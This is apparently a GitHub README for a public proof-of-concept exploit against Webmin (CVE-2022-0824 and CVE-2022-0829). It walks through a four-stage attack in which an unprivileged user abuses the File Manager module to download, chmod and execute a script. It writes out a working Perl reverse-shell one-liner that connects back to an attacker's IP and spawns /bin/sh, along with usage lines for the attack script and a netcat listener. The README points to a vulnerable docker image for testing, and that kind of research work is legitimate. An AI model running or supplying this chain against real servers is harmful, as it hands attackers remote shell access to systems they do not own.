Skip to content

CVE-2022-0824, CVE-2022-0829, File Manger privilege exploit

Notifications You must be signed in to change notification settings

gokul-ramesh/WebminRCE-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - File Manger privilege exploit

Vulnerable application to test this PoC can be found here as a docker image.
Prerequisites:

  • Python3
  • Requests module

Description

Vulnerability

Improper Access Control to Remote Code Execution Safe users (Unpriviledged user) can access File Manager module, which should be restricted by default.

Exploit Payload

Use Improper Access control vulnerability to upload a cgi file into the webmin server.

Stage 1 (Authentication)

Authenticate and login to the server with a safe/less priviledged user.

Stage 2 (Download file into server)

Make use of the vulnerable File Manager (/file-manager/http_download.cgi) module to download a perl script into the server.
Perl Script to get a reverse shell access :
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Stage 3 (Modify permission)

Add executable permission to the file (/file-manager/chmod.cgi)

Stage 4 (Execute Command)

Simply call the uploaded file to execute the reverse shell script present inside same.

Usage directions :

  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

Usage example:

$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

Username and Password are for safe users (non-priviledged) Setup listener before running the script to get reverse shell connection.

$ nc -lvp <port>

Thanks to @faisalfs10x for the exploit.